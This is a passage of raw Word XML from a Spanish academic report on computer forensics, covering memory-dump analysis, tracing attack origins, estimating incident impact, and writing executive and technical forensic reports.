      <w:r w:rsidR="008A7329" w:rsidRPr="00C43B18">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>cómo</w:t>
      </w:r>
      <w:r w:rsidRPr="00C43B18">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> se actuó</w:t>
      </w:r>
      <w:r w:rsidRPr="006F21A3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Para determinar cómo se actuó es importante llevar a cabo una investigación sobre la memoria del equipo. Es interesante realizar un volcado de memoria para la obtención de cierta información. Con programas destinados a tal fin podremos ver que procesos se están ejecutando en el momento concreto y también aquellos que hayan sido ocultados para no levantar sospechas. Con esta información podremos saber qué ejecutables inician los procesos en ejecución y qué librerías se ven involucradas. Llegados aquí se puede </w:t>
      </w:r>
      <w:r w:rsidR="008A7329" w:rsidRPr="006F21A3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>realizar</w:t>
      </w:r>
      <w:r w:rsidRPr="006F21A3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> volcados de los ejecutables y de dichas librerías para poder analizar si contienen cadenas sospechosas o si, por lo contrario, son archivos legítimos. Sabiendo los procesos que se ejecutan y su naturaleza podemos obtener pistas de cómo se actuó para comprometer el equipo.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B8F31B5" w14:textId="5BDECF3C" w:rsidR="006F21A3" w:rsidRPr="009440E4" w:rsidRDefault="006F21A3" w:rsidP="006F21A3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F21A3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Finalmente, otra práctica interesante para determinar cómo se actuó es leer la secuencia de comandos escrita por consola. Para ello procederemos con el volcado de memoria y podremos obtener dicha información. De este modo podremos leer que comandos se hicieron por consola y sabremos si se ejecutó algún proceso de este modo. Debemos excluir nuestras propias instrucciones pues seguramente aparecerán los comandos del volcado de memoria que se hicieron en su momento. Relativo a esta práctica, personalmente es la primera que se debería de realizar en un análisis forense, de </w:t>
      </w:r>
      <w:r w:rsidR="008A7329" w:rsidRPr="006F21A3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ahí</w:t>
      </w:r>
      <w:r w:rsidRPr="006F21A3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> también poder corroborar que es lo que pueda decir el usuario en una posible entrevista, que en este caso no va </w:t>
      </w:r>
      <w:r w:rsidRPr="009440E4">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>a ser posible.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A26985E" w14:textId="54A84C87" w:rsidR="006F21A3" w:rsidRPr="009440E4" w:rsidRDefault="006F21A3" w:rsidP="006F21A3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009440E4">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Para la tarea de identificación de autores, cabe destacar </w:t>
      </w:r>
      <w:r w:rsidR="008A7329" w:rsidRPr="009440E4">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>que,</w:t>
      </w:r>
      <w:r w:rsidRPr="009440E4">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> para poder realizar una identificación del autor o autores del incidente, otra información importante que nos puede dar el volcado de memoria son las conexiones de red abiertas y las que están preparadas para enviar o recibir datos. Con esto podremos relacionar el posible origen del ataque buscando datos como la dirección IP</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IP (Internet Protocol): Protocolo de comunicaciones que proporciona una dirección única (IP) para cada dispositivo en la red."</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 xml:space="preserve"> en Internet.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000C7CD5" w14:textId="4F281FF3" w:rsidR="006F21A3" w:rsidRPr="009440E4" w:rsidRDefault="006F21A3" w:rsidP="006F21A3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009440E4">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Hay que actuar con prudencia puesto que en ocasiones se utilizan técnicas para distribuir los ataques o falsear la dirección IP</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IP (Internet Protocol): Protocolo de comunicaciones que proporciona una dirección única (IP) para cada dispositivo en la red."</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 Hay que ser crítico con la información que se obtiene y contrastarla correctamente. No siempre se obtendrá la respuesta al primer intento y posiblemente en ocasiones sea muy difícil averiguar el origen de un incidente.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25FCB78A" w14:textId="26DC1C45" w:rsidR="006F21A3" w:rsidRPr="006F21A3" w:rsidRDefault="006F21A3" w:rsidP="006F21A3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009440E4">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Para establecer el impacto causado, cabe destacar que se puede calcular en base a distintos factores y no hay un método único para su cálculo, ni una fórmula que nos dé un importe económico. Aun </w:t>
      </w:r>
      <w:r w:rsidR="008A7329" w:rsidRPr="009440E4">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>así,</w:t>
      </w:r>
      <w:r w:rsidRPr="009440E4">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> para estos cálculos puede servir ayudarse de métodos como BIA (Business Impact Analysis) que determinan el impacto de ciertos eventos ayudando a valorar los daños económicamente</w:t>
      </w:r>
      <w:r w:rsidRPr="006F21A3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F83A10B" w14:textId="77777777" w:rsidR="006F21A3" w:rsidRPr="006F21A3" w:rsidRDefault="006F21A3" w:rsidP="006F21A3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F21A3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>A la larga cualquier incidente ocurrido devengará en unos gastos económicos que habrá que cuantificar en función de los ítems afectados tras el suceso. En ocasiones el coste económico resultará de tener que reemplazar una máquina o dispositivo que ha quedado inservible tras un ataque o bien las horas de empleado de tener que reinstalar el sistema. En este caso, el cálculo no supone mayor dificultad y se resuelve fácilmente.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61E8EAC2" w14:textId="77777777" w:rsidR="006F21A3" w:rsidRPr="006F21A3" w:rsidRDefault="006F21A3" w:rsidP="006F21A3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F21A3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>En otras ocasiones, por ejemplo, los daños pueden deberse al robo de una información de secreto industrial en el que habrá que cuantificar no sólo qué supone reponer el sistema sino, a la larga, en qué se verá afectada la empresa. Los datos robados pueden ser para publicar cierta información sobre la empresa y poner en la opinión pública datos con intenciones de crear mala imagen, lo cual supone un daño incalculable y muy elevado para la empresa.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DAFA315" w14:textId="0110B06A" w:rsidR="006F21A3" w:rsidRPr="006F21A3" w:rsidRDefault="006F21A3" w:rsidP="006F21A3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F21A3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">El impacto no sólo se puede calcular en base económica. Como ya se ha comentado al inicio de esta sección también existen otros factores, es el caso del tiempo de inactividad. Si el incidente ha supuesto paralizar la producción de una planta automatizada de fabricación esto supone muchas horas en que la producción es nula, por lo </w:t>
      </w:r>
      <w:r w:rsidR="008A7329" w:rsidRPr="006F21A3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>tanto,</w:t>
      </w:r>
      <w:r w:rsidRPr="006F21A3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> no se trabajará. Evidentemente, a la larga también supondrá un problema económico pues no se podrán servir los pedidos pendientes de los clientes. Si la </w:t>
      </w:r>
      <w:r w:rsidRPr="006F21A3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">paralización afecta a una oficina, tal vez no se pare la producción de </w:t>
      </w:r>
      <w:r w:rsidR="008A7329" w:rsidRPr="006F21A3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>bienes,</w:t>
      </w:r>
      <w:r w:rsidRPr="006F21A3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> pero sí el trabajo de los empleados que verán retrasado todo su trabajo.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="632997C0" w14:textId="34CB0880" w:rsidR="006F21A3" w:rsidRPr="006F21A3" w:rsidRDefault="00062086" w:rsidP="006F21A3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C43B18">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Presentación</w:t>
      </w:r>
      <w:r w:rsidR="006F21A3" w:rsidRPr="00C43B18">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="656E05EE" w14:textId="77777777" w:rsidR="006F21A3" w:rsidRPr="006F21A3" w:rsidRDefault="006F21A3" w:rsidP="006F21A3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F21A3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>La última fase de un análisis forense queda para redactar los informes que documenten los antecedentes del evento, todo el trabajo realizado, el método seguido y las conclusiones e impacto que se ha derivado de todo el incidente.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D1D3AB0" w14:textId="075F5842" w:rsidR="006F21A3" w:rsidRPr="006F21A3" w:rsidRDefault="006F21A3" w:rsidP="006F21A3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F21A3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Para ello se redactarán dos informes, a saber, el informe técnico y el ejecutivo. En esencia en ambos informes se explican los mismos </w:t>
      </w:r>
      <w:r w:rsidR="008A7329" w:rsidRPr="006F21A3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>hechos,</w:t>
      </w:r>
      <w:r w:rsidRPr="006F21A3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> pero varía su enfoque y el grado de detalle con que se expone el asunto.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31CFD584" w14:textId="77777777" w:rsidR="006F21A3" w:rsidRPr="006F21A3" w:rsidRDefault="006F21A3" w:rsidP="006F21A3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F21A3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>- En el informe ejecutivo se usará un lenguaje claro y sin tecnicismos, se debe evitar usar terminología propia de la ciencia e ingeniería y expresiones confusas para gente no ducha en el tema. Hay que pensar que el público lector de estos informes serán jueces y gerentes que seguramente estén poco relacionados con el tema y además tengan poco tiempo para dedicarle. Se les debe facilitar la tarea al máximo.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44528351" w14:textId="76077105" w:rsidR="006F21A3" w:rsidRPr="006F21A3" w:rsidRDefault="006F21A3" w:rsidP="006F21A3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F21A3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>En el informe técnico, por el contrario, el público final será técnico y con conocimientos de la materia que se expone. Aquí se detallarán todos los procesos, los programas utilizados, las técnicas, etcétera. Debemos crear un documento que pueda servir de guía para repetir todo el proceso que se ha realizado en caso necesario.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="747B0EE8" w14:textId="7D69C1F4" w:rsidR="006F21A3" w:rsidRPr="006F21A3" w:rsidRDefault="006F21A3" w:rsidP="006F21A3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F21A3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Relativo al informe ejecutivo, cabe destacar que será un resumen de toda la tarea que se ha llevado a cabo con las evidencias digitales. Aunque será un documento de poca extensión, al menos comparado con el informe técnico, éste </w:t>
      </w:r>
      <w:r w:rsidR="008A7329" w:rsidRPr="006F21A3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>deber</w:t>
      </w:r>
      <w:r w:rsidR="008A7329">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>í</w:t>
      </w:r>
      <w:r w:rsidR="008A7329" w:rsidRPr="006F21A3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidRPr="006F21A3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> contener al menos los siguientes apartados:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25440FBB" w14:textId="312D573E" w:rsidR="006F21A3" w:rsidRPr="007B11B9" w:rsidRDefault="006F21A3" w:rsidP="007B11B9">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C43B18">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Motivos de la intrusión.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F1C5206" w14:textId="4EB93A67" w:rsidR="006F21A3" w:rsidRPr="00C43B18" w:rsidRDefault="006F21A3">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C43B18">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Desarrollo de la intrusión.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="129C6771" w14:textId="3D7ECF6E" w:rsidR="006F21A3" w:rsidRPr="00C43B18" w:rsidRDefault="006F21A3">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C43B18">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Resultados del análisis.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51E6E8F8" w14:textId="397129F5" w:rsidR="006F21A3" w:rsidRPr="00C43B18" w:rsidRDefault="006F21A3">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C43B18">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Recomendaciones.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50E6A184" w14:textId="77777777" w:rsidR="006F21A3" w:rsidRPr="006F21A3" w:rsidRDefault="006F21A3" w:rsidP="006F21A3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F21A3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>El informe técnico será más largo que el anterior y contendrá mucho más detalle. Se hará una exposición muy detallada de todo el análisis con profundidad en la tecnología usada y los hallazgos. En este caso se deberá redactar, al menos:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38FF4AD9" w14:textId="644D349F" w:rsidR="006F21A3" w:rsidRPr="00C43B18" w:rsidRDefault="006F21A3">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C43B18">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Antecedentes del incidente.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="243BF418" w14:textId="694F9373" w:rsidR="006F21A3" w:rsidRPr="00C43B18" w:rsidRDefault="006F21A3">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C43B18">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Recolección de datos.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FEF976A" w14:textId="71927170" w:rsidR="006F21A3" w:rsidRPr="00C43B18" w:rsidRDefault="006F21A3">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C43B18">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Descripción de la evidencia.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AA3A821" w14:textId="4F2EFB70" w:rsidR="006F21A3" w:rsidRPr="008A7329" w:rsidRDefault="006F21A3">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A7329">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Entorno de trabajo del análisis.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58ACFC0E" w14:textId="2A74081A" w:rsidR="006F21A3" w:rsidRPr="008A7329" w:rsidRDefault="006F21A3">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A7329">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Análisis de las evidencias.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="048457F3" w14:textId="22DCA9C9" w:rsidR="006F21A3" w:rsidRPr="008A7329" w:rsidRDefault="006F21A3">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A7329">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Descripción de los resultados.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A4637C7" w14:textId="07B692A6" w:rsidR="006F21A3" w:rsidRPr="008A7329" w:rsidRDefault="006F21A3">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A7329">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Dar la línea temporal de los hechos ocurridos con todo detalle.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62D69F6A" w14:textId="3F9BBC89" w:rsidR="006F21A3" w:rsidRPr="008A7329" w:rsidRDefault="006F21A3">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A7329">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Redactar unas conclusiones con las valoraciones que se crean oportunas a la vista de todo el análisis realizado.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73038D9F" w14:textId="1BB0798C" w:rsidR="00D504A6" w:rsidRDefault="006F21A3">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A7329">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Dar unas recomendaciones sobre cómo proteger los equipos para no repetir el incidente o sobre cómo actuar legalmente contra el autor.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DAD12BC" w14:textId="77777777" w:rsidR="004F7594" w:rsidRDefault="004F7594" w:rsidP="004F7594">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="345365C6" w14:textId="77777777" w:rsidR="004F35EE" w:rsidRPr="004F7594" w:rsidRDefault="004F35EE" w:rsidP="004F7594">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0E7994E6" w14:textId="41C6DF01" w:rsidR="00D504A6" w:rsidRDefault="00E82E18" w:rsidP="00E82E18">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
      </w:pPr>
      <w:bookmarkStart w:id="12" w:name="_Toc155782499"/>
      <w:r w:rsidRPr="00E82E18">
        <w:lastRenderedPageBreak/>
        <w:t>1.4.</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00E82E18">
        <w:t>Descripción del entorno de trabajo.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="12"/>
    </w:p>
    <w:p w14:paraId="06A7FEF4" w14:textId="77777777" w:rsidR="00D504A6" w:rsidRDefault="00D504A6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C15CD32" w14:textId="251EC56D" w:rsidR="00E82E18" w:rsidRPr="00E82E18" w:rsidRDefault="00E82E18" w:rsidP="00E82E18">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E82E18">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>El entorno de trabajo para un análisis forense enfocado en la exploración de memoria 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E82E18">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> y disco duro exige una meticulosa preparación y adecuación de las herramientas y espacios de trabajo. Las evidencias, provenientes tanto de la RAM como del almacenamiento persistente del ordenador en cuestión, se convierten en el pilar fundamental del análisis, permitiendo la evaluación de procesos en ejecución, archivos almacenados, registros de actividad y cualquier otro elemento que pueda arrojar luz sobre las acciones realizadas en la máquina.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F2BA2B5" w14:textId="67917671" w:rsidR="00E82E18" w:rsidRPr="00E82E18" w:rsidRDefault="00E82E18" w:rsidP="00E82E18">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E82E18">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>En un segundo plano, pero no menos esencial, se encuentra el portátil personal, que se configura como la estación de trabajo principal para la realización del análisis forense. Este debe estar equipado con un sistema operativo que, comúnmente en el ámbito forense, suele ser alguna distribución de Linux, junto con una serie de herramientas específicas para el análisis forense (como Autopsy</w:t>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> XE "</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="00D308D3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
